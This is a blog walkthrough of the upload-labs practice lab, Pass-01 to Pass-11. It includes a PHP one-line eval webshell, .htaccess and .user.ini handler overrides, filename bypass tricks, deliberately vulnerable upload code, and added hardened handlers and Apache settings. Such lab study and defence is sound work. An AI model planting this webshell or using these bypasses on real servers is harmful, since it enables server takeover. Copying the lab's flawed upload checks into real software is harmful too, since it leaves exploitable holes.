Not quite sure whether this post counts as CTF or attack/defense, but they're all one family anyway, so whatever, I'll file it under both (
Got asked in an interview about file upload exploitation ideas and bypass tricks...
Those memories were dead and buried.
I wrote these notes a long time ago; now that I'm being asked about the details... hmm, everything I haven't used in ages is completely forgotten.
So I'm republishing them, and reading them through myself as a bit of memory-recovery therapy (
Plenty of masters online have posted walkthroughs of this lab; unworthy as I am, I'll write up my own notes too (*^_^*)
This post covers Pass-01 through Pass-11.
Note!
The locally installed lab environment has a small issue out of the box that can break some levels; the steps below fix it.
In phpStudy (小皮), open settings, choose configuration files, find Apache's httpd.conf, and add the following line:
AddType application/x-httpd-php .php .phtml .phps .php5 .pht
Without it, php5 code will not be parsed.
Remember to restart phpStudy after the change ~
I won't go over installing the lab or using phpStudy.
After clearing each level, remember to clean up the uploaded files!!
There seem to be several different versions of upload-labs, and the level configurations and bypass tricks differ between versions. I'll write down every technique I've collected from the different versions (even if it doesn't reproduce in my lab environment); you never know whether a trick will come in handy in the field until you've learned it.
PHP one-line webshell
In case anyone doesn't know, a quick explanation:
<?php
@eval($_POST['rice']);
?>
One line: the $_POST superglobal plus eval() form the shell; paired with tools like Caidao or AntSword it can take the target directly.
The goal of file upload attacks is to get our shell-carrying file onto the server.
Pass-01
One validation method + two bypass methods
Write a phpma.php (any name), containing the one-line shell, and try uploading it directly.
The Maginot Line: JS branch
A (JS) alert pops up; this is pure front-end JS filtering, a Maginot Line through and through.
Bypassing it is easy. First method:
Intercept and modify the request
Rename the extension to .jpg so our shell looks like a legitimate file at validation time, but keep the proxy intercepting.
Once the request has passed the JS check and is about to go out, change the extension back to .php; if the back end does no validation, it will dutifully treat the file as PHP. Goal achieved.
Catch the leader first
Just disable JS. Nothing fancy needed.
Did the upload succeed?
Test it (connecting to yourself with AntSword works too)
POST a phpinfo via the rice parameter; it works.
How do you find where the uploaded shell ended up?
Locally you can just browse the directory (
Of course, it's in the source of the response page.
(The test URL has two \upload segments because my lab site isn't inside phpStudy's www directory; I added an extra directory level, also named upload.)
Pass-01 source:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name'];
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '文件类型不正确,请重新上传!';
}
} else {
$msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
}
}
Pass-02
One validation method + one bypass method
The same old trick fails (obviously), and looking at the request doesn't reveal much either.
Reading the source makes the validation method clear.
MIME validation
if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif'))
From the source, this level validates the file type (MIME).
So just edit the request.
Whatever it validates, change that.
With Burp intercepting, change the Content-Type field to image/jpg (either of the other two works as well) and Forward; it goes straight through.
I won't demonstrate the upload result at every level; the same shell uploaded to the same place behaves the same (
Pass-02 source:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name'];
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '文件类型不正确,请重新上传!';
}
} else {
$msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
}
}
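Both handlers above decide purely on $_FILES['upload_file']['type'], which PHP copies from the Content-Type header of the multipart part, i.e. a value the client writes. The following is an added example (not upload-labs code) of the same handler rewritten to sniff the type from the file's bytes with finfo, ignore the client-supplied name entirely, and store the file under a server-chosen random name. UPLOAD_PATH is assumed to be defined by the including script, as it is in the lab; ALLOWED_IMAGE_TYPES and store_image_upload() are names chosen for this example.

```php
<?php
// Added example, not upload-labs code. Assumes UPLOAD_PATH is defined by the
// caller (as in the lab) and that the fileinfo extension is enabled.

// Sniffed MIME type => the only extension we will ever write to disk for it.
// The extension the client sent is never used.
const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Store one uploaded image. Returns the stored path, or null if rejected.
 * $file is one entry of $_FILES, e.g. $_FILES['upload_file'].
 */
function store_image_upload(array $file, string $upload_dir): ?string
{
    if (!isset($file['tmp_name'], $file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return null;
    }
    // Refuse anything that did not arrive through the HTTP upload mechanism.
    if (!is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Sniff the real type from the bytes on disk. $file['type'] is whatever
    // the client put in the multipart Content-Type header (the Pass-02 bypass).
    $finfo   = new finfo(FILEINFO_MIME_TYPE);
    $sniffed = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED_IMAGE_TYPES[$sniffed])) {
        return null;
    }
    // Server-chosen random basename + fixed extension from the sniffed type,
    // so nothing in the original name (.php, .htaccess, trailing dots, ::$DATA)
    // ever reaches the filesystem.
    $dest = rtrim($upload_dir, '/') . '/' . bin2hex(random_bytes(16))
          . '.' . ALLOWED_IMAGE_TYPES[$sniffed];
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    return $dest;
}

if (isset($_POST['submit'], $_FILES['upload_file'])) {
    $stored    = store_image_upload($_FILES['upload_file'], UPLOAD_PATH);
    $is_upload = $stored !== null;
    $msg       = $is_upload ? null : '文件类型不正确,请重新上传!';
}
```

Sniffing only closes the Content-Type hole: a file that starts with a valid image header and carries PHP further down still passes finfo. What actually stops execution is the combination of the forced image extension, the random name (so nothing uploaded is ever parsed as PHP or as .htaccess) and, ideally, an upload directory where the server has PHP execution turned off.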
Pass-03
Straight to source analysis (as if there were that many features you could recognise black-box)
Blacklist filtering
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array('.asp','.aspx','.php','.jsp');
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name); // strip trailing dots from the filename
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); // convert to lowercase
$file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
$file_ext = trim($file_ext); // trim leading/trailing whitespace
The key part is this block: the blacklist holds four entries, .asp .aspx .php .jsp, and then the processing follows.
Outside the three realms
With a grade-school blacklist like this there's no need to think about how to keep the filename alive through validation; just go around it: a .phtml does the trick.
.phtml .pht .phtm .phps .php1 .php2 .php3 .php4 .php5 .php6 .php7 all work.
But! Note this line further down in the source:
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
It's all randomised, so what if we can't find where our shell landed?
Here it's shown in the response body, but in a real-world scenario that's not guaranteed (
Pass-03 source:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array('.asp','.aspx','.php','.jsp');
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name); // strip trailing dots from the filename
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); // convert to lowercase
$file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
$file_ext = trim($file_ext); // trim leading/trailing whitespace
if(!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
Pass-04
The blackest blacklist
Look at the source: a grand slam.
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".ini");
$file_name = trim($_FILES['upload_file']['name']);
The previous level's trick no longer works (
So we can't keep grinding on the filename.
The .htaccess triple kill
Basically any blacklist that doesn't filter .htaccess can be beaten this way.
So what is .htaccess? Here's a pasted explanation:
.htaccess is a plain-text file containing configuration directives for the Apache server.
Its main uses are URL rewriting, custom error pages, MIME type configuration and access control: pseudo-static URLs, image hotlink protection, custom 404 pages, blocking/allowing specific IPs or IP ranges, directory listing and index pages, denying access to given file types, password-protecting files, and so on.
.htaccess applies mainly to the directory it sits in.
MIME type configuration, right? So upload a .htaccess first, then upload an image carrying the shell, and let the .htaccess tell the back end to parse the image as PHP. Shell uploaded.
Method one:
<FilesMatch "phpma.png">
SetHandler application/x-httpd-php
</FilesMatch>
// if phpma.png exists in the current directory, it will be parsed as .php
Method two:
AddType application/x-httpd-php .png
// any file in the current directory ending in .png will be parsed as .php
Upload it, then upload our shell with a .png suffix, and we're done.
Possible methods in other versions
Change the extension to .php. .
Because the source doesn't validate in a loop, the whitespace trim, trailing-dot removal, ::$DATA stripping and lowercasing each run only once. So the bypass idea is simple: in the request, change the extension to .php. .
Validation walkthrough: first it sees a dot and removes it; then it sees a space and removes that too; we still have one dot left, i.e. .php. Since it validates only once, it won't remove that remaining dot, so the upload succeeds and the file parses as well.
If this works, it also beats level five, but my lab environment just shows an upload error; noting this nice idea down anyway for a rainy day.
Pass-04 source:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name); // strip trailing dots from the filename
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); // convert to lowercase
$file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
$file_ext = trim($file_ext); // trim leading/trailing whitespace
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
Pass-05
This would have been better placed at level nine; the ordering doesn't feel very sensible.
No blackest, only blacker
Try the old .htaccess trick again: doesn't work.
Even that's filtered; out of ideas.
The source doesn't give away anything special either.
This is where our blood-pumping combo with .user.ini comes in!
The hint says there's a readme.php in the upload directory, so how can that be used? (Mainly thanks to .ini not being filtered.)
.user.ini is also a PHP configuration file. Unlike php.ini, which is global and applies to the whole web service,
.user.ini is a user-written configuration file that applies to a single directory.
Here's the standard answer, courtesy of Baidu (
user.ini: Since PHP 5.3.0, PHP supports .htaccess-style INI files on a per-directory basis. These files are processed only by the CGI/FastCGI SAPI. This feature makes the PECL htscanner extension obsolete. If you are using Apache, a .htaccess file has the same effect.
In addition to the main php.ini, PHP scans for INI files in each directory, starting from the directory of the PHP file being executed and going up to the web root (as given by $_SERVER['DOCUMENT_ROOT']). If the PHP file is outside the web root, only its own directory is scanned.
Only INI settings with the PHP_INI_PERDIR and PHP_INI_USER modes are recognised in .user.ini-style INI files.
Two new INI directives, user_ini.filename and user_ini.cache_ttl, control the use of user INI files.
user_ini.filename sets the filename PHP looks for in each directory; if set to an empty string, PHP doesn't scan at all. The default is .user.ini.
※ user_ini.cache_ttl controls how often user INI files are re-read. The default is 300 seconds (5 minutes). ※
Two .user.ini settings are useful here:
Method one:
auto_prepend_file = filename // included at the top of the file
Method two:
auto_append_file = filename // included at the end of the file
.user.ini has broad applicability: not just Apache, but Nginx as well, as long as the server has FastCGI enabled.
In summary, for this trick to work (for .user.ini to take effect) three conditions must be met:
- The server-side scripting language is PHP
- The server runs PHP in CGI/FastCGI mode
- The upload directory contains an executable PHP file
Now for real: create a .user.ini file with the following content:
auto_prepend_file = phpma.jpg
This means every PHP file automatically includes phpma.jpg.
Contents of phpma.jpg:
<?php
@eval($_POST['rice']);
?>
Then, uh, wait five minutes (the default 300 seconds mentioned above); go to the bathroom, drink some water, check your phone.
When time's up, connect to readme.php with AntSword and it's done.
Possible methods in other versions
Some versions of level five drop the lowercase conversion, so an extension like .Php can be used to bypass it (only on Windows; Linux without special configuration is strictly case-sensitive).
Pass-05 source:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name); // strip trailing dots from the filename
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); // convert to lowercase
$file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
$file_ext = trim($file_ext); // trim leading/trailing whitespace
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
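Pass-04 and Pass-05 both work because the upload directory is allowed to carry its own configuration (.htaccess under mod_php, .user.ini under CGI/FastCGI) and because the web server will execute scripts from that directory at all. The following is an added example of an Apache 2.4 configuration fragment (not part of upload-labs) that removes both conditions for the upload directory; the path /var/www/html/upload is an assumption chosen for this example.

```apache
# Added example, not upload-labs configuration. Assumes Apache 2.4 and that
# the lab's upload directory is /var/www/html/upload.
<Directory "/var/www/html/upload">
    # Ignore .htaccess entirely in this tree, so an uploaded one cannot add
    # SetHandler/AddType rules (the Pass-04 trick).
    AllowOverride None

    # Never hand any script-like extension that still lands here to PHP, or
    # serve it at all. Unlike the lab's blacklists this is a last line, not
    # the only one: the upload handler should already force an image extension.
    <FilesMatch "\.(php[0-9]?|phtml|pht|phps|phar)$">
        Require all denied
    </FilesMatch>

    # Under mod_php, additionally switch the PHP engine off for this directory.
    <IfModule mod_php.c>
        php_admin_flag engine off
    </IfModule>
</Directory>

# For php-fpm / FastCGI (the Pass-05 trick), the matching setting lives in
# php.ini, not here: an empty user_ini.filename stops PHP from looking for
# per-directory .user.ini files at all:
#     user_ini.filename =
```

The <IfModule mod_php.c> guard is an assumption about the module's source-file name for PHP 8 builds; on PHP 7 builds it is mod_php7.c. Storing uploads outside the document root and serving them through a script that sets the Content-Type itself makes all three rules above redundant, which is the more robust design.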
Pass-06
Case doesn't matter
This level drops the case conversion, so simply changing .php to .Php bypasses it.
But it seems HackBar can't be used for testing anymore; only AntSword works, and AntSword connecting to localhost may have issues; configuring a proxy fixes it.
Pass-06 source:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name); // strip trailing dots from the filename
$file_ext = strrchr($file_name, '.');
$file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
$file_ext = trim($file_ext); // trim leading/trailing whitespace
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
Pass-07
Don't underestimate the space
This level drops the trim() that removes whitespace; intercept and change the extension to ".php " (with a trailing space) and it's bypassed.
Testing is again just connecting with AntSword.
Pass-07 source:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = $_FILES['upload_file']['name'];
$file_name = deldot($file_name); // strip trailing dots from the filename
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); // convert to lowercase
$file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件不允许上传';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
Pass-08
A tiny dot
This level doesn't strip the trailing dot from the extension.
Just append a dot: .php. does it.
// the next few levels are far softer than level five
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); // convert to lowercase
$file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
$file_ext = trim($file_ext); // trim leading/trailing whitespace
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
Pass-09
The power of ::$DATA
This level doesn't filter ::$DATA.
So what is ::$DATA?
On Windows (NTFS), whatever follows ::$DATA is treated as the file's data stream. If you upload rice.php::$DATA, the extension check doesn't catch it (it's recognised as a data stream), but after upload the file is still parsed as .php.
So phpma.php::$DATA bypasses it.
Pass-09 source:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); // convert to lowercase
$file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
$file_ext = trim($file_ext); // trim leading/trailing whitespace
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
Pass-10
This level collects every filter, blacklisting htaccess and ini too; what now?
The trick of all tricks
A single-pass check kills our extension, but killing it only once is still too weak.
Build the extension .php. . (analysed in Pass-04).
Pass-10 source:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name); // strip trailing dots from the filename
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); // convert to lowercase
$file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
$file_ext = trim($file_ext); // trim leading/trailing whitespace
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
Pass-11
This level shares a trick with SQL injection.
File upload seems to have gotten a bit fancy.
It deletes every blacklisted suffix from the filename outright; everything gets mashed.
None of the earlier tricks work anymore.
It pulled out a Sword of Fate.
Still the same as ever: it only kills once. I'll double-write; can you one-shot me?
Double-write .php as .pphphp; after one deletion it becomes .php and survives.
Pass-11 source:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess","ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = str_ireplace($deny_ext,"", $file_name);
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
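Every bypass from Pass-03 through Pass-11 exploits the same two design flaws: the check is a blacklist, and each cleanup step runs exactly once, so the name that is checked is not the name that ends up on disk. The following is an added example (not upload-labs code) that replays the lab's single-pass blacklist logic and the Pass-11 strip logic against filenames of the shapes described in this post, next to an allowlist check that canonicalises the name to a fixed point before deciding. deldot() is not on the page, so it is modelled as rtrim($name, '.'); the blacklist is abbreviated, the sample filenames are constructed for the demo, and all function names are this example's own.

```php
<?php
// Added example, not upload-labs code. Models the Pass-04/05/10 blacklist
// (single pass per cleanup step), the Pass-11 token stripping, and a hardened
// allowlist check, on constructed sample filenames.

const DENY_EXT  = ['.php', '.php5', '.phtml', '.pht', '.htaccess', '.ini']; // abbreviated lab list
const ALLOW_EXT = ['jpg', 'jpeg', 'png', 'gif'];

// Pass-04/05/10 shape: each cleanup runs once; accept if "not blacklisted".
// (Pass-07 drops the trim(), Pass-08 drops deldot(), Pass-09 drops the
// ::$DATA removal; this models the full version.)
function lab_blacklist_accepts(string $name): bool
{
    $name = trim($name);
    $name = rtrim($name, '.');                  // deldot(): trailing dots only
    $ext  = strrchr($name, '.');
    $ext  = $ext === false ? '' : $ext;
    $ext  = strtolower($ext);
    $ext  = str_ireplace('::$DATA', '', $ext);
    $ext  = trim($ext);
    return !in_array($ext, DENY_EXT, true);
}

// Pass-11 shape: delete blacklisted tokens from the name once, then accept
// whatever is left as the on-disk name.
function lab_strip_name(string $name): string
{
    return str_ireplace(['php', 'phtml', 'htaccess', 'ini'], '', trim($name));
}

// Hardened: reduce the name to a canonical form first, then require the
// extension to be on an allowlist. The loop runs until nothing changes, so
// layered names (".php. .", "::$DATA", double-written tokens) cannot be
// checked in one shape and stored in another.
function canonical_extension(string $name): ?string
{
    $name = preg_replace('/::\$DATA.*$/i', '', $name); // drop NTFS stream suffix
    $nul  = strpos($name, "\0");
    if ($nul !== false) {
        $name = substr($name, 0, $nul);                // nothing after a NUL byte
    }
    do {
        $before = $name;
        $name   = rtrim(trim($name), ". ");            // trailing dots AND spaces, together
    } while ($name !== $before);
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return $ext === '' ? null : $ext;
}

function allowlist_accepts(string $name): bool
{
    $ext = canonical_extension($name);
    return $ext !== null && in_array($ext, ALLOW_EXT, true);
}

// Constructed inputs matching the shapes discussed in the post.
$samples = ['cat.jpg', 'shell.php', 'shell.php. .', 'shell.php ', 'shell.php.',
            'shell.php::$DATA', 'shell.pphphp'];
foreach ($samples as $s) {
    printf("%-22s lab-blacklist:%-5s pass11-stored-as:%-14s allowlist:%s\n",
        json_encode($s),
        lab_blacklist_accepts($s) ? 'pass' : 'deny',
        json_encode(lab_strip_name($s)),
        allowlist_accepts($s) ? 'pass' : 'deny');
}
```

Run it with php and compare the columns: "shell.php. ." and "shell.pphphp" sail through the lab's blacklist (the latter is stored as shell.php by the Pass-11 logic), while the allowlist column denies every name except cat.jpg. Note that the allowlist version needs no deldot(), no ::$DATA special case and no token stripping to get there: once the decision is "is the canonical extension one I serve as a static image", there is nothing left for a double-write or a trailing dot to slip past.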

Rice, the legend!!!!